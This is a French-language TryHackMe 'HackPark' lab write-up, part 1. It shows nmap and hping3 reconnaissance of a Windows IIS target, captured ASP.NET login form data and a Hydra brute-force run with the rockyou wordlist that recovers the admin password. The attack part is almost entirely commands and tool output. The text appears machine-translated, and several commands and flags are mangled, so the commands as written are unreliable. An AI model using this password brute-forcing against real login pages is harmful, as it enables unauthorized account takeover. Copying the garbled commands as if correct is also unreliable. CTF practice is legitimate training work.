[Tryhackme] J'ai essayé l'attaque de force brute en utilisant Hydra! HACKPARK WRITEUP PARTIE 1

$ cat / etc / hôtes 127.0.0.1 LocalHost 127.0.1.1 HackLab # Les lignes suivantes sont souhaitables pour les hôtes capables IPv6 :: 1 localhost ip6-localhost ip6-loopback ff02 :: 1 ip6-allnodes ff02 :: 2 ip6-allrouters 10.10.225.246 hack-Park.hkl

$ nmap -pn -t4 -a hack-park.hkl démarrage nmap 7.92 (https://nmap.org) au 2023-02-09 23:39 JST NMAP Rapport de numérisation pour hack-park.hkl (10.10.225.246) Host Is Up (0.27s Latence). Non montré: 998 Ports TCP filtrés (non-réponse) State State Service version 80 / TCP Open HTTP Microsoft IIS Httpd 8.5 | http-robots.txt: 6 entrées interdites | /Account/*.* / search /search.aspx /error404.aspx | _ / archive /archive.aspx | HTTP-Methods: | _ Méthodes potentiellement risquées: Trace | _HTTP-Title: HackPark | HackPark Amusements | _http-Server-Header: Microsoft-IIS / 8.5 3389 / TCP Open SSL / MS-WBT-Server? | rdp-ntlm-info: | Target_name: hackpark | Netbios_domain_name: hackpark | Netbios_computer_name: hackpark | Dns_domain_name: hackpark | Dns_computer_name: hackpark | Product_version: 6.3.9600 | _ System_time: 2023-02-09T14: 41: 06 + 00: 00 | SSL-CERT: Sujet: CommonName = HackPark | Pas valide avant: 2023-02-08T14: 32: 44 | _not valide après: 2023-08-10T14: 32: 44 | _SSL-Date: 2023-02-09T14: 41: 10 + 00: 00; -1s à partir de l'heure du scanner. Informations sur le service: OS: Windows; CPE: CPE: / O: Microsoft: détection de service Windows effectuée. Veuillez signaler tout résultat incorrect sur https://nmap.org/submit/. NMAP fait: 1 adresse IP (1 hôte) scanné en 119,06 secondes

$ sudo hping3 -s hack-Park.hkl -p 80 -c 4 127 ⨯ hping hack-Park.hkl (tun0 10.10.225.246): s set, 40 en-têtes + 0 octets de données Len = 44 IP = 10.10.225.246 TTL = 127 df id = 3645 Sport = 80 Flags = sa seq = 0 win = 8192 RTT = 230.20. LEN = 44 IP = 10.10.225.246 TTL = 127 DF ID = 3646 Sport = 80 Flags = SA SEQ = 1 WIN = 8192 RTT = 265,8 MS LEN = 44 IP = 10.10.225.246 TTL = 127 DF ID = 3647 SPORT = 80 FLAGS = SA SEQ = 2 WIN = 8192 IP = 10.10.225.246 TTL = 127 DF ID = 3648 SPORT = 80 FLAGS = SA SEQ = 3 WIN = 8192 RTT = 272,5 ms --- Hack-Park.hkl Hping Statistics --- 4 paquets transmis, 4 paquets reçus, 0% Packet Loss Rack-Trip Min / Avg / Max = 265.8 / 272.9 / 280.2 Mme

$ nc hack-Park.hkl 80 1 ⨯ Head / Http / 1.0 HTTP / 1.1 200 OK Cache-Control: Private Content-Length: 9429 Content-Type: Text / Html; Charset = serveur UTF-8: Microsoft-IIS / 8.5 Content-style-Type: Text / CSS Content-Script-Type: Text / JavaScript X-Powered-par: ASP.NET Date: Thu, 09 février 2023 14:51:30 Connexion GMT: Close: Close

$ localiser rockyou.txt /usr/share/wordlists/rockyou.txt.gz $ sudo gunzip /usr/share/wordlists/rockyou.txt.gz

sudo vi post.data

__ViewState = mkyxgv5% 2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4% 2BHGCOCU9VMMRKI352KLS8GBM9EXXTNTVXU62XKHH M5jcy7vvjsnp6m% 2bpyxx9bhlp327jm1dv% 2fkvwvh3x2yg1bvsx3kvb0qobr2or5dek% 2fndmyjwbkgrd0v% 2B3DDSAG36IW P4upf7k% 2ftot2fh2b0b0zd8jgkfcx4vb2u% 2b9nfoqhyodgupMbx4mn9p% 2B% 2BBCJJMlekqho0xnmf9xn5sqkvesca7zwj vvx3xy% 2fd5zbc8rfaqu% 2fql7hgrpqsjvufybmtwnpfm3rj0hn5oe% 2b6bnculfwceexskcz43lvgiioqinmd3jlimawyik Din% 2F8W3QEAFNTZJVO6EF & __ EventValidation = DPNMF% 2B9ZEMIBHS7B1HK6DNT% 2FTHWJB% 2F% 2BDA7% 2BU9AHP9OAWH CESDP46TVSXIQ6OMGHQQBC3YNR3A9QI895RU6YTP0D% 2BLKL6UPJXUSDGCAYWGFBKBPUMFRG2P5CGERFO9GVKJFKH% 2BIHQNS LBY73AOR7XTZO7% 2F% 2BT8EYJOA8XHFJUFNU9FQRVO & CTL00% 24MAINCONTENT% 24LOGINUSER% 24USERNAME = Admin & CTL0 0% 24Maincontent% 24loginUser% 24Password = admin & ctl00% 24maincontent% 24loginuser% 24loginbutton = log + en

$ Cat Post.data __ViewState = mkyxgv5% 2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4% 2BHGCOCU9VMMRKI352KLS8GBM9EXXTNTVXU62XKHH M5jcy7vvjsnp6m% 2bpyxx9bhlp327jm1dv% 2fkvwvh3x2yg1bvsx3kvb0qobr2or5dek% 2fndmyjwbkgrd0v% 2B3DDSAG36IW P4upf7k% 2ftot2fh2b0b0zd8jgkfcx4vb2u% 2b9nfoqhyodgupMbx4mn9p% 2B% 2BBCJJMlekqho0xnmf9xn5sqkvesca7zwj vvx3xy% 2fd5zbc8rfaqu% 2fql7hgrpqsjvufybmtwnpfm3rj0hn5oe% 2b6bnculfwceexskcz43lvgiioqinmd3jlimawyikd Dans% 2F8W3QEAFNTZJVO6EF & __ EventValidation = DPNMF% 2B9ZEMIBHS7B1HK6DNT% 2FTHWJB% 2F% 2BDA7% 2BU9AHP9OAWHC ESDP46TVSXIQ6OMGHQQBC3YNR3A9QI895RU6YTP0D% 2BLKL6UPJXUSDGCAYWGFBKBPUMFRG2P5CGERFO9GVKJFKH% 2BIHQNSL BY73AOR7XTZO7% 2F% 2BT8EYJOA8XHFJUFNU9FQRVO & CTL00% 24MAINCONTENT% 24LOGINUSER% 24USERNAME = ^ User ^ & CTL00 % 24Maincontent% 24loginUser% 24Password = ^ pass ^ & ctl00% 24maincontent% 24loginuser% 24loginbutton = log + en

$ Hydra -l admin -p /usr/share/wordlists/rockyou.txt hack-park.hkl http-Post-formul "/Account/login.aspx:__Viewstate=Mkyxgv5%2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4%2BHGCOCU9VMMRKI352KLS8GB M9EYXTNTVXU62XKHHM5JCY7VVJSNP6M% 2BPYXX9BHLP327JM1DV% 2FKVWVH3X2YG1BVSX3KVB0QOBR2OR5DEK% 2FNDMYJWBKGRD0 V% 2B3DDSAG36IWP4UPF7K% 2FTOT2FH2B0B0ZD8JGKFCX4VB2U% 2B9NFOQHYODGUPMBX4MN9P% 2B% 2BBCJJMLEKQHO0XNMF9XN5SQ KVESCA7ZWJVVX3XY% 2FD5ZBC8RFAqu% 2fql7hgrpqsjvufybmtwnpfm3rj0hn5oe% 2b6bnCulfwceexskcz43lvgiioqinmd3jli Mawyikdin% 2F8W3QEAFNTZJVO6EF & __ EventValidation = DPNMF% 2B9ZEMIBHS7B1HK6DNT% 2FTHWJB% 2F% 2BDA7% 2BU9AHP9OA Whcesdp46tvsxiq6omghqqbc3ynr3a9qi895ru6ytp0d% 2blkl6upjxusdgcaywgfbkbpumfrg2p5cgerfo9gvkjfkh% 2BiHQnslb Y73AOR7XTZO7% 2F% 2BT8EYJOA8XHFJUFNU9FQRVO & CTL00% 24MAINCONTENT% 24LOGINUSER% 24USERNAME = ^ User ^ & CTL00% 24M ainContent% 24loginUser% 24Password = ^ pass ^ & ctl00% 24Maincontent% 24loginuser% 24loginbutton = log + dans: f = connexion échoué"

$ Hydra -l admin -p /usr/share/wordlists/rockyou.txt hack-park.hkl http-Post-formul "/Account/login.aspx:__Viewstate=Mkyxgv5%2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4%2BHGCOCU9VMMRKI352KLS8GB M9EYXTNTVXU62XKHHM5JCY7VVJSNP6M% 2BPYXX9BHLP327JM1DV% 2FKVWVH3X2YG1BVSX3KVB0QOBR2OR5DEK% 2FNDMYJWBKGRD0 V% 2B3DDSAG36IWP4UPF7K% 2FTOT2FH2B0B0ZD8JGKFCX4VB2U% 2B9NFOQHYODGUPMBX4MN9P% 2B% 2BBCJJMLEKQHO0XNMF9XN5SQ KVESCA7ZWJVVX3XY% 2FD5ZBC8RFAqu% 2fql7hgrpqsjvufybmtwnpfm3rj0hn5oe% 2b6bnCulfwceexskcz43lvgiioqinmd3jli Mawyikdin% 2F8W3QEAFNTZJVO6EF & __ EventValidation = DPNMF% 2B9ZEMIBHS7B1HK6DNT% 2FTHWJB% 2F% 2BDA7% 2BU9AHP9OA Whcesdp46tvsxiq6omghqqbc3ynr3a9qi895ru6ytp0d% 2blkl6upjxusdgcaywgfbkbpumfrg2p5cgerfo9gvkjfkh% 2BiHQnslb Y73AOR7XTZO7% 2F% 2BT8EYJOA8XHFJUFNU9FQRVO & CTL00% 24MAINCONTENT% 24LOGINUSER% 24USERNAME = ^ User ^ & CTL00% 24M ainContent% 24loginUser% 24Password = ^ pass ^ & ctl00% 24Maincontent% 24loginuser% 24loginbutton = log + dans: f = connexion Échec "Hydra v9.2 (c) 2021 par Van Hauser / THC et David Maciejak - Veuillez ne pas utiliser dans les organisations militaires ou secrètes, ou à des fins illégales (ce n'est pas contraignant, ces *** ignorent les lois et l'éthique de toute façon). Hydra (https://github.com/vanhauser-thc/thc-hydra) à partir de 2023-02-10 00:57:21 [Données] MAX 16 tâches par 1 serveur, globalement 16 tâches, 14344399 Tentes de connexion (l: 1 / p: 14344399), ~ 896525 Tries par tâche [Dona] http-posost-forme: //hack-park.hkl: 80 / compte / login.aspx: __ViewState = mkyxgv5% 2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJ Xx4% 2BHGCOCU9VMMRKI352KLS8GBM9EYXTNTVXU62XKHM5JCY7VVJSNP6M% 2BPYXX9BHLP327JM1DV% 2FKVWVH3X2YG1BVSX3KVB0QO BR2OR5DEK% 2FNDMYJWBKGRD0V% 2B3DDSAG36IWP4UPF7K% 2FTOT2FH2B0B0ZD8JGKFCX4VB2U% 2B9NFOQHYODGUPMBX4MN9P% 2B% 2BBBC jjmlekqho0xnmf9xn5sqkvesca7zwjvvx3xy% 2fd5zbc8rfaqu% 2fql7hgrpqsjvuffybmtwnpfm3rj0hn5oe% 2b6bnculfwceExskcz4 3LVGIIOQINMD3JLIMAWYIKDIN% 2F8W3QEAFFNTZJVO6EF & __ EVENTVALIDATION = DPNMF% 2B9ZEMIBHS7B1HK6DNT% 2FTHWJB% 2F% 2BDA 7% 2BU9AHP9OAWHCESDP46TVSXIQ6OMGHQQBC3YNR3A9QI895RU6YTP0D% 2BLKL6UPJXUSDGCAYWGFBKBPUMFRG2P5CGERFO9GVKJFKH% 2 Bihqnslby73aor7xtzo7% 2f% 2Bt8eyjoa8xhfjufnu9fqrvo & ctl00% 24Maincontent% 24loginUser% 24USERNAME = ^ user ^ & ctl00 % 24Maincontent% 24loginUser% 24Password = ^ pass ^ & ctl00% 24maincontent% 24loginuser% 24loginbutton = log + dans: f = connexion Échec [Statut] 707.00 Tries / Min, 707 Essais en 00: 01h, 14343692 à faire en 338: 09h, 16 actif [80] [Http-Post-Form] Hôte: Hack-Park.hkl Login: Mot de passe administrateur: 1qaz2wsx 1 de 1 cible terminée, 1 Mot de passe valide trouvé Hydra (https://github.com/vanhauser-thc/thc-hydra) terminé au 2023-02-10 00:59:22